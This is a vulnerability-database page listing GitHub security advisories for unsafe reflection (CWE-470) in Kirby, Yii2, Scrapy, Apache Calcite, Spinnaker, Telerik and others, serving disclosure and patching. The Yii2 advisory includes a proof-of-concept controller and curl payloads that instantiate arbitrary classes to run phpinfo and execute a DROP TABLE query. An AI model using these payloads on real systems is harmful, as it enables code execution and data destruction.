Common Weakness Enumeration

CWE-470

Allowed

Use of Externally-Controlled Input to Select Classes or Code ('Unsafe Reflection')

Abstraction: Base · Status: Draft

The product uses external input with reflection to select which classes or code to use, but it does not sufficiently prevent the input from selecting improper classes or code.

113 vulnerabilities reference this CWE, most recent first.

GHSA-86RH-H242-J8XP

Vulnerability from github – Published: 2026-05-26 23:47 – Updated: 2026-05-26 23:47
VLAI
Summary
Kirby CMS has an Arbitrary Method Call via REST API Search and Collection Query Endpoints
Details

TL;DR

This vulnerability affects all Kirby sites that might have potential attackers in the group of authenticated Panel users.

This vulnerability is of high severity for affected sites and has a high real-world impact.


Introduction

Arbitrary method call is a type of arbitrary code execution. It is a vulnerability that allows attackers to run any commands or code of the attacker's choice on a target machine or in a target process.

Depending on the set of accessible methods, this can lead to disclosure of sensitive information or to unintended and malicious write actions.

Affected components

Kirby's data model is made up of model objects that are contained in collection objects. These collections can be queried with methods such as $collection->filter(), $collection->sort(), $collection->group(), $collection->pluck() and $collection->findBy(). Each of these methods allows to query the models contained in the collection by any accessible model attribute (field or method).

Kirby also provides endpoints in its REST API that allow to search through users or through children and files of the site or of a particular page. These endpoints allow the search, not, filter and sort queries as well as options to paginate the result. The same kind of queries can also be provided to API collections such as /<site|page|user>/blueprints, /<site|page>/children, /<model>/files, /languages, /roles, /translations, /users and /<user>/roles.

Impact

In affected releases, Kirby did not validate the model attributes that were used in the collection queries. This allowed attackers to include arbitrary model methods in their queries. This includes methods with sensitive data such as password() (disclosing the password hash) or root() (disclosing the absolute filesystem path on the server) as well as methods that perform impactful actions such as loginPasswordless() (causing a privilege escalation to another user) or delete() (deleting all queried models in one go if the authenticated user has appropriate permissions).

Patches

The problem has been patched in Kirby 4.9.1 and Kirby 5.4.1. Please update to one of these or a later version to fix the vulnerability.

In all of the mentioned releases, Kirby has added a blocklist of sensitive model methods that should not be called during collection operations and limited the query options for the affected endpoints to search and pagination.

Credits

Kirby thanks @mojamojam for responsibly reporting the identified issue.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 4.9.0"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "getkirby/cms"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.9.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 5.4.0"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "getkirby/cms"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "5.0.0"
            },
            {
              "fixed": "5.4.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-44174"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-470"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-26T23:47:17Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### TL;DR\n\nThis vulnerability affects all Kirby sites that might have potential attackers in the group of authenticated Panel users.\n\n**This vulnerability is of high severity for affected sites and has a high real-world impact.**\n\n----\n\n### Introduction\n\nArbitrary method call is a type of arbitrary code execution. It is a vulnerability that allows attackers to run any commands or code of the attacker\u0027s choice on a target machine or in a target process.\n\nDepending on the set of accessible methods, this can lead to disclosure of sensitive information or to unintended and malicious write actions.\n\n### Affected components\n\nKirby\u0027s data model is made up of model objects that are contained in collection objects. These collections can be queried with methods such as `$collection-\u003efilter()`, `$collection-\u003esort()`, `$collection-\u003egroup()`, `$collection-\u003epluck()` and `$collection-\u003efindBy()`. Each of these methods allows to query the models contained in the collection by any accessible model attribute (field or method).\n\nKirby also provides endpoints in its REST API that allow to search through users or through children and files of the site or of a particular page. These endpoints allow the `search`, `not`, `filter` and `sort` queries as well as options to paginate the result. The same kind of queries can also be provided to API collections such as `/\u003csite|page|user\u003e/blueprints`, `/\u003csite|page\u003e/children`, `/\u003cmodel\u003e/files`, `/languages`, `/roles`, `/translations`, `/users` and `/\u003cuser\u003e/roles`.\n\n### Impact\n\nIn affected releases, Kirby did not validate the model attributes that were used in the collection queries. This allowed attackers to include arbitrary model methods in their queries. This includes methods with sensitive data such as `password()` (disclosing the password hash) or `root()` (disclosing the absolute filesystem path on the server) as well as methods that perform impactful actions such as `loginPasswordless()` (causing a privilege escalation to another user) or `delete()` (deleting all queried models in one go if the authenticated user has appropriate permissions).\n\n### Patches\n\nThe problem has been patched in [Kirby 4.9.1](https://github.com/getkirby/kirby/releases/tag/4.9.1) and [Kirby 5.4.1](https://github.com/getkirby/kirby/releases/tag/5.4.1). Please update to one of these or a [later version](https://github.com/getkirby/kirby/releases) to fix the vulnerability.\n\nIn all of the mentioned releases, Kirby has added a blocklist of sensitive model methods that should not be called during collection operations and limited the query options for the affected endpoints to search and pagination.\n\n### Credits\n\nKirby thanks @mojamojam for responsibly reporting the identified issue.",
  "id": "GHSA-86rh-h242-j8xp",
  "modified": "2026-05-26T23:47:17Z",
  "published": "2026-05-26T23:47:17Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/getkirby/kirby/security/advisories/GHSA-86rh-h242-j8xp"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/getkirby/kirby"
    },
    {
      "type": "WEB",
      "url": "https://github.com/getkirby/kirby/releases/tag/4.9.1"
    },
    {
      "type": "WEB",
      "url": "https://github.com/getkirby/kirby/releases/tag/5.4.1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Kirby CMS has an Arbitrary Method Call via REST API Search and Collection Query Endpoints"
}

GHSA-8G5Q-MP2W-J766

Vulnerability from github – Published: 2024-01-30 09:30 – Updated: 2024-01-30 09:30
VLAI
Details

Use of Externally-Controlled Input to Select Classes or Code ('Unsafe Reflection') vulnerability in Mitsubishi Electric Corporation EZSocket versions 3.0 and later, FR Configurator2 all versions, GT Designer3 Version1(GOT1000) all versions, GT Designer3 Version1(GOT2000) all versions, GX Works2 versions 1.11M and later, GX Works3 all versions, MELSOFT Navigator versions 1.04E and later, MT Works2 all versions, MX Component versions 4.00A and later and MX OPC Server DA/UA all versions allows a remote unauthenticated attacker to execute a malicious code by RPC with a path to a malicious library while connected to the products.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-6943"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-470"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-01-30T09:15:47Z",
    "severity": "CRITICAL"
  },
  "details": "Use of Externally-Controlled Input to Select Classes or Code (\u0027Unsafe Reflection\u0027) vulnerability in Mitsubishi Electric Corporation EZSocket versions 3.0 and later, FR Configurator2 all versions, GT Designer3 Version1(GOT1000) all versions, GT Designer3 Version1(GOT2000) all versions, GX Works2 versions 1.11M and later, GX Works3 all versions, MELSOFT Navigator versions 1.04E and later, MT Works2 all versions, MX Component versions 4.00A and later and MX OPC Server DA/UA all versions allows a remote unauthenticated attacker to execute a malicious code by RPC with a path to a malicious library while connected to the products.",
  "id": "GHSA-8g5q-mp2w-j766",
  "modified": "2024-01-30T09:30:34Z",
  "published": "2024-01-30T09:30:34Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6943"
    },
    {
      "type": "WEB",
      "url": "https://jvn.jp/vu/JVNVU95103362"
    },
    {
      "type": "WEB",
      "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-030-02"
    },
    {
      "type": "WEB",
      "url": "https://www.mitsubishielectric.com/en/psirt/vulnerability/pdf/2023-020_en.pdf"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-8G7P-XH7P-947J

Vulnerability from github – Published: 2025-05-14 15:31 – Updated: 2025-08-27 15:33
VLAI
Details

In Progress® Telerik® UI for AJAX, versions 2011.2.712 to 2025.1.218, an unsafe reflection vulnerability exists that may lead to an unhandled exception resulting in a crash of the hosting process and denial of service.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-3600"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400",
      "CWE-470"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-05-14T14:15:29Z",
    "severity": "HIGH"
  },
  "details": "In Progress\u00ae Telerik\u00ae UI for AJAX, versions 2011.2.712 to 2025.1.218, an unsafe reflection vulnerability exists that may lead to an unhandled exception resulting in a crash of the hosting process and denial of service.",
  "id": "GHSA-8g7p-xh7p-947j",
  "modified": "2025-08-27T15:33:13Z",
  "published": "2025-05-14T15:31:38Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-3600"
    },
    {
      "type": "WEB",
      "url": "https://www.telerik.com/products/aspnet-ajax/documentation/knowledge-base/kb-security-unsafe-reflection-cve-2025-3600"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-8WJ8-CFXR-9374

Vulnerability from github – Published: 2025-11-13 22:22 – Updated: 2025-11-13 22:22
VLAI
Summary
AWS Advanced NodeJS Wrapper: Privilege Escalation in Aurora PostgreSQL instance
Details

Description of Vulnerability:

An issue in AWS Wrappers for Amazon Aurora PostgreSQL may allow for privilege escalation to rds_superuser role. A low privilege authenticated user can create a crafted function that could be executed with permissions of other Amazon Relational Database Service (RDS) users.

AWS recommends that customers upgrade to the following version: AWS NodeJS Wrapper to v2.0.1.

Source of Vulnerability Report:

Allistair Ishmael Hakim allistair.hakim@gmail.com

Affected products & versions:

AWS NodeJS Wrapper < 2.0.1.

Platforms:

MacOS/Windows/Linux

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "aws-advanced-nodejs-wrapper"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.0.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-470"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-11-13T22:22:37Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Description of Vulnerability: \nAn issue in AWS Wrappers for Amazon Aurora PostgreSQL may allow for privilege escalation to rds_superuser role. A low privilege authenticated user can create a crafted function that could be executed with permissions of other Amazon Relational Database Service (RDS) users.\n\nAWS recommends that customers upgrade to the following version:  AWS NodeJS Wrapper to v2.0.1.\n\n\n### Source of Vulnerability Report:\nAllistair Ishmael Hakim [allistair.hakim@gmail.com](mailto:allistair.hakim@gmail.com)\n\n\n### Affected products \u0026 versions: \nAWS NodeJS Wrapper \u003c 2.0.1.\n\n\n### Platforms: \nMacOS/Windows/Linux",
  "id": "GHSA-8wj8-cfxr-9374",
  "modified": "2025-11-13T22:22:37Z",
  "published": "2025-11-13T22:22:37Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/aws/aws-advanced-nodejs-wrapper/security/advisories/GHSA-8wj8-cfxr-9374"
    },
    {
      "type": "WEB",
      "url": "https://github.com/aws/aws-advanced-nodejs-wrapper/pull/574"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/aws/aws-advanced-nodejs-wrapper"
    },
    {
      "type": "WEB",
      "url": "https://github.com/aws/aws-advanced-nodejs-wrapper/releases/tag/2.0.1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "AWS Advanced NodeJS Wrapper: Privilege Escalation in Aurora PostgreSQL instance"
}

GHSA-C2RV-HWQM-WJPG

Vulnerability from github – Published: 2026-06-02 12:31 – Updated: 2026-07-09 21:19
VLAI
Summary
Apache Calcite is Vulnerable to Use of Externally-Controlled Input to Select Classes
Details

Use of Externally-Controlled Input to Select Classes or Code ('Unsafe Reflection') vulnerability in Apache Calcite.

This issue affects Apache Calcite: from 1.5.0 before 1.42.

Users are recommended to upgrade to version 1.42, which fixes the issue.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.apache.calcite:calcite-core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.5.0"
            },
            {
              "fixed": "1.42.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-46718"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-470"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-07-09T21:19:28Z",
    "nvd_published_at": "2026-06-02T10:16:25Z",
    "severity": "MODERATE"
  },
  "details": "Use of Externally-Controlled Input to Select Classes or Code (\u0027Unsafe Reflection\u0027) vulnerability in Apache Calcite.\n\nThis issue affects Apache Calcite: from 1.5.0 before 1.42.\n\nUsers are recommended to upgrade to version 1.42, which fixes the issue.",
  "id": "GHSA-c2rv-hwqm-wjpg",
  "modified": "2026-07-09T21:19:28Z",
  "published": "2026-06-02T12:31:26Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-46718"
    },
    {
      "type": "WEB",
      "url": "https://github.com/apache/calcite/commit/5855cfa14d8038e2a123ff6ce9722edce0e0cc25"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/apache/calcite"
    },
    {
      "type": "WEB",
      "url": "https://issues.apache.org/jira/browse/CALCITE-7532"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread/9s37svo343w5ck1ovh478lkzcqk4949v"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2026/06/01/7"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Apache Calcite is Vulnerable to Use of Externally-Controlled Input to Select Classes"
}

GHSA-C473-VF2F-6X9M

Vulnerability from github – Published: 2024-10-09 15:32 – Updated: 2024-10-09 15:32
VLAI
Details

In Progress Telerik Report Server versions prior to 2024 Q3 (10.2.24.924), a remote code execution attack is possible through object injection via an insecure type resolution vulnerability.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-8015"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-470"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-10-09T15:15:17Z",
    "severity": "CRITICAL"
  },
  "details": "In Progress Telerik Report Server versions prior to 2024 Q3 (10.2.24.924), a remote code execution attack is possible through object injection via an insecure type resolution vulnerability.",
  "id": "GHSA-c473-vf2f-6x9m",
  "modified": "2024-10-09T15:32:21Z",
  "published": "2024-10-09T15:32:21Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-8015"
    },
    {
      "type": "WEB",
      "url": "https://docs.telerik.com/report-server/knowledge-base/insecure-type-resolution-cve-2024-8015"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-C8Q4-9H32-2WW8

Vulnerability from github – Published: 2026-06-22 20:43 – Updated: 2026-06-22 20:43
VLAI
Summary
Spinnaker has uon-safe yaml deserialization, allowing RCE when using specific types
Details

Impact

There's an unsafe YAML processing vulnerability that bypasses safe deserialization. This impacts users when when performing: * CloudFormation deployments * CloudFoundry Baking

The usage of a non-safe constructor use allows arbitrary loading of Java classes leading to RCE.

Patches

2025.3.3, 2026.0.3 and 2025.4.4.

Workarounds

Disable the CloudFormation system and cloudfoundry baking operations.

Resources

Join Spinnaker on Slack for more information!

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "io.spinnaker.rosco:rosco-core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2025.3.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "io.spinnaker.orca:orca-core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2025.3.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "io.spinnaker.rosco:rosco-core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2025.4.0"
            },
            {
              "fixed": "2025.4.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "io.spinnaker.rosco:rosco-core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2026.0.0"
            },
            {
              "fixed": "2026.0.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "io.spinnaker.orca:orca-core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2025.4.0"
            },
            {
              "fixed": "2025.4.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "io.spinnaker.orca:orca-core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2026.0.0"
            },
            {
              "fixed": "2026.0.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-44795"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-470",
      "CWE-502"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-22T20:43:37Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Impact\nThere\u0027s an unsafe YAML processing vulnerability that bypasses safe deserialization. This impacts users when when performing:\n* CloudFormation deployments\n* CloudFoundry Baking\n\nThe usage of a non-safe constructor use allows arbitrary loading of Java classes leading to RCE.\n\n### Patches\n 2025.3.3, 2026.0.3 and 2025.4.4.\n\n### Workarounds\nDisable the CloudFormation system and cloudfoundry baking operations.\n\n### Resources\nJoin Spinnaker on Slack for more information!",
  "id": "GHSA-c8q4-9h32-2ww8",
  "modified": "2026-06-22T20:43:37Z",
  "published": "2026-06-22T20:43:37Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/spinnaker/spinnaker/security/advisories/GHSA-c8q4-9h32-2ww8"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/spinnaker/spinnaker"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Spinnaker has uon-safe yaml deserialization, allowing RCE when using specific types"
}

GHSA-CJCC-P67M-7QXM

Vulnerability from github – Published: 2024-06-02 22:30 – Updated: 2025-04-01 23:13
VLAI
Summary
Unsafe Reflection in base Component class in yiisoft/yii2
Details

Yii2 supports attaching Behaviors to Components by setting properties having the format 'as <behaviour-name>'.

Internally this is done using the __set() magic method. If the value passed to this method is not an instance of the Behavior class, a new object is instantiated using Yii::createObject($value). However, there is no validation check that verifies that $value is a valid Behavior class name or configuration. An attacker that can control the content of the $value variable can then instantiate arbitrary classes, passing parameters to their constructors and then invoking setter methods.

Impact

With some effort malicious code can be injected executed which might be anything ranging from deleting files to dropping database tables

Patches

Not yet patched.

Workarounds

No Work around available

References

Reported Here

in case the link is dead, here is the full description

Description

Yii2 supports attaching Behaviors to Components by setting properties having the format 'as <behaviour-name>'.

Internally this is done using the __set() magic method. If the value passed to this method is not an instance of the Behavior class, a new object is instantiated using Yii::createObject($value). However, there is no validation check that verifies that $value is a valid Behavior class name or configuration. An attacker that can control the content of the $value variable can then instantiate arbitrary classes, passing parameters to their constructors and then invoking setter methods.

Depending on the installed dependencies various kind of attacks are possible.

Proof of Concept

A PoC application was created using composer create-project, as specified in the getting started.

Yii JSON parser was enabled in the configuration:

'parsers' => [ 'application/json' => 'yii\web\JsonParser' ]

A vulnerable controller was added:

<?php

namespace app\controllers;

use yii\base\Component;
use yii\web\Controller;

class ExploitableController extends Controller
{
    public function beforeAction($action): bool
    {
        // Needed only to simplify the PoC
        $this->enableCsrfValidation = false;
        return parent::beforeAction($action);
    }

    public function actionVulnerable(): string
    {
        $fields = $this->request->post();
        $myComponent = new Component();
        foreach ($fields as $key => $value) {
            $myComponent->$key = $value;
        }
        return "";
    }
}

Executing phpinfo()

Following command stores the content of phpinfo() inside info.html:

curl -XPOST -H "Content-Type: application/json" -d '{"as hack": {"__class":"GuzzleHttp\\Psr7\\FnStream", "__construct()": [[]], "_fn_close": "phpinfo"}}' http://localhost:8080/index.php?r=exploitable%2Fvulnerable > info.html

It leverages the fact that GuzzleHttp\Psr7\FnStream class executes call_user_func($this->_fn_close) inside __destruct(). This class is a default dependency.

Executing arbitrary MySQL queries (blind execution)

If the application is connected to a MySQL database it is possible to exploit the PDO class to execute arbitrary SQL queries:

curl -XPOST -H "Content-Type: application/json" -d '{"as hack": {"__class":"\\PDO", "__construct()": ["mysql:host=127.0.0.1;dbname=test", "test", "test", {"1002": "DROP TABLE test"}]}}' http://localhost:8080/index.php?r=exploitable%2Fvulnerable

Notice that the server will always return a 500 Internal Server Error (because the instantiated class is not a Behavior), however the query is executed, even if we can't receive any output from it. If the query fails we might see a PDO error message (i.e. "Table 'test.foo' doesn't exist"), depending on the app configuration.

Impact

It is not trivial to exploit this bug, because it depends on peculiar characteristics of the target application. However, it looks that there is at least one very popular product built on Yii2 that is severely affected by this vulnerability (allowing to an anonymous user to gain admin access, with an easy exploit).

The consequences of the exploitation could vary from retrieving sensitive information to DoS or unauthorized access.

Occurrences

Component.php L191

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "yiisoft/yii2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.0.49.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-4990"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-470"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-06-02T22:30:39Z",
    "nvd_published_at": "2025-03-20T10:15:32Z",
    "severity": "HIGH"
  },
  "details": "Yii2 supports attaching Behaviors to Components by setting properties having the format `\u0027as \u003cbehaviour-name\u003e\u0027`.\n\nInternally this is done using the `__set()` magic method. If the value passed to this method is not an instance of the `Behavior` class, a new object is instantiated using `Yii::createObject($value)`. However, there is no validation check that verifies that `$value` is a valid `Behavior` class name or configuration. An attacker that can control the content of the $value variable can then instantiate arbitrary classes, passing parameters to their constructors and then invoking setter methods.\n\n### Impact\nWith some effort malicious code can be injected executed which might be anything ranging from deleting files to dropping database tables\n\n### Patches\nNot yet patched.\n\n### Workarounds\nNo Work around available\n\n### References\nReported [Here](https://huntr.com/bounties/4fbdd965-02b6-42e4-b57b-f98f93415b8f?token=3bcfc5266870680af19a26170b8dbf3750e3b593ce192da8eaa6a03f96b99b52c419e15768c56f23991dc50003aa1a9e3cb3f1f9321e18bd506d68a9f937cd5b7ca90fb47967df22c8768c0c48f7206f36b583464af7e44bf93eecc5398a2764b98e02cf8e280397785106db16e4197951554eb9b9c46649f4339e2f413cf6a0197ab2e0) \n\nin case the link is dead, here is the full description\n\n# Description\n\nYii2 supports attaching Behaviors to Components by setting properties having the format  `\u0027as \u003cbehaviour-name\u003e\u0027`.\n\nInternally this is done using the  `__set()`  magic method. If the value passed to this method is not an instance of the Behavior class, a new object is instantiated using  `Yii::createObject($value)`. However, there is no validation check that verifies that  `$value`  is a valid Behavior class name or configuration. An attacker that can control the content of the  `$value`  variable can then instantiate arbitrary classes, passing parameters to their constructors and then invoking setter methods.\n\nDepending on the installed dependencies various kind of attacks are possible.\n\n# Proof of Concept\n\nA PoC application was created using  `composer create-project`, as specified in the  [getting started](https://www.yiiframework.com/doc/guide/2.0/en/start-installation).\n\nYii JSON parser was enabled in the configuration:\n\n```php\n\u0027parsers\u0027 =\u003e [ \u0027application/json\u0027 =\u003e \u0027yii\\web\\JsonParser\u0027 ]\n\n```\n\nA vulnerable controller was added:\n\n```php\n\u003c?php\n\nnamespace app\\controllers;\n\nuse yii\\base\\Component;\nuse yii\\web\\Controller;\n\nclass ExploitableController extends Controller\n{\n    public function beforeAction($action): bool\n    {\n        // Needed only to simplify the PoC\n        $this-\u003eenableCsrfValidation = false;\n        return parent::beforeAction($action);\n    }\n\n    public function actionVulnerable(): string\n    {\n        $fields = $this-\u003erequest-\u003epost();\n        $myComponent = new Component();\n        foreach ($fields as $key =\u003e $value) {\n            $myComponent-\u003e$key = $value;\n        }\n        return \"\";\n    }\n}\n\n```\n\n## Executing phpinfo()\n\nFollowing command stores the content of  `phpinfo()`  inside info.html:\n\n```bash\ncurl -XPOST -H \"Content-Type: application/json\" -d \u0027{\"as hack\": {\"__class\":\"GuzzleHttp\\\\Psr7\\\\FnStream\", \"__construct()\": [[]], \"_fn_close\": \"phpinfo\"}}\u0027 http://localhost:8080/index.php?r=exploitable%2Fvulnerable \u003e info.html\n\n```\n\nIt leverages the fact that  `GuzzleHttp\\Psr7\\FnStream`  class executes  `call_user_func($this-\u003e_fn_close)`  inside  `__destruct()`. This class is a default dependency.\n\n## Executing arbitrary MySQL queries (blind execution)\n\nIf the application is connected to a MySQL database it is possible to exploit the  `PDO`  class to execute arbitrary SQL queries:\n\n```bash\ncurl -XPOST -H \"Content-Type: application/json\" -d \u0027{\"as hack\": {\"__class\":\"\\\\PDO\", \"__construct()\": [\"mysql:host=127.0.0.1;dbname=test\", \"test\", \"test\", {\"1002\": \"DROP TABLE test\"}]}}\u0027 http://localhost:8080/index.php?r=exploitable%2Fvulnerable\n\n```\n\nNotice that the server will always return a 500 Internal Server Error (because the instantiated class is not a Behavior), however the query is executed, even if we can\u0027t receive any output from it. If the query fails we might see a PDO error message (i.e. \"Table \u0027test.foo\u0027 doesn\u0027t exist\"), depending on the app configuration.\n\n# Impact\n\nIt is not trivial to exploit this bug, because it depends on peculiar characteristics of the target application. However, it looks that there is at least one very popular product built on Yii2 that is severely affected by this vulnerability (allowing to an anonymous user to gain admin access, with an easy exploit).\n\nThe consequences of the exploitation could vary from retrieving sensitive information to DoS or unauthorized access.\n\n# Occurrences\n\n[Component.php L191](https://github.com/yiisoft/yii2/blob/2.0.48/framework/base/Component.php#L191)",
  "id": "GHSA-cjcc-p67m-7qxm",
  "modified": "2025-04-01T23:13:58Z",
  "published": "2024-06-02T22:30:39Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/yiisoft/yii2/security/advisories/GHSA-cjcc-p67m-7qxm"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-4990"
    },
    {
      "type": "WEB",
      "url": "https://github.com/yiisoft/yii2/pull/20183"
    },
    {
      "type": "WEB",
      "url": "https://github.com/yiisoft/yii2/commit/628d406bfafb80fc32147837888c0057d89a021e"
    },
    {
      "type": "WEB",
      "url": "https://github.com/yiisoft/yii2/commit/62d081f18c3602d09e7d075bba3a0ca5c313f0b4"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/yiisoft/yii2/CVE-2024-4990.yaml"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/yiisoft/yii2"
    },
    {
      "type": "WEB",
      "url": "https://github.com/yiisoft/yii2/blob/master/framework/CHANGELOG.md#2050-may-30-2024"
    },
    {
      "type": "WEB",
      "url": "https://huntr.com/bounties/4fbdd965-02b6-42e4-b57b-f98f93415b8f"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Unsafe Reflection in base Component class in yiisoft/yii2"
}

GHSA-CWXJ-RR6W-M6W7

Vulnerability from github – Published: 2026-03-13 20:02 – Updated: 2026-03-13 20:02
VLAI
Summary
Scrapy: Arbitrary Module Import via Referrer-Policy Header in RefererMiddleware
Details

Impact

Since version 1.4.0, Scrapy respects the Referrer-Policy response header to decide whether and how to set a Referer header on follow-up requests.

If the header value looked like a valid Python import path, Scrapy would import the referenced object and call it, assuming it referred to a referrer policy class (for example, scrapy.spidermiddlewares.referer.DefaultReferrerPolicy) and attempting to instantiate it to handle the Referer header.

A malicious site could exploit this by setting Referrer-Policy to a path such as sys.exit, causing Scrapy to import and execute it and potentially terminate the process.

Patches

Upgrade to Scrapy 2.14.2 (or later).

Workarounds

If you cannot upgrade to Scrapy 2.14.2, consider the following mitigations.

  • Disable the middleware: If you don't need the Referer header on follow-up requests, set REFERER_ENABLED to False.
  • Set headers manually: If you do need a Referer, disable the middleware and set the header explicitly on the requests that require it.
  • Set referrer_policy in request metadata: If disabling the middleware is not viable, set the referrer_policy request meta key on all requests to prevent evaluating preceding responses' Referrer-Policy. For example:
Request(
    url,
    meta={
        "referrer_policy": "scrapy.spidermiddlewares.referer.DefaultReferrerPolicy",
    },
)

Instead of editing requests individually, you can:

  • implement a custom spider middleware that runs before the built-in referrer policy middleware and sets the referrer_policy meta key; or
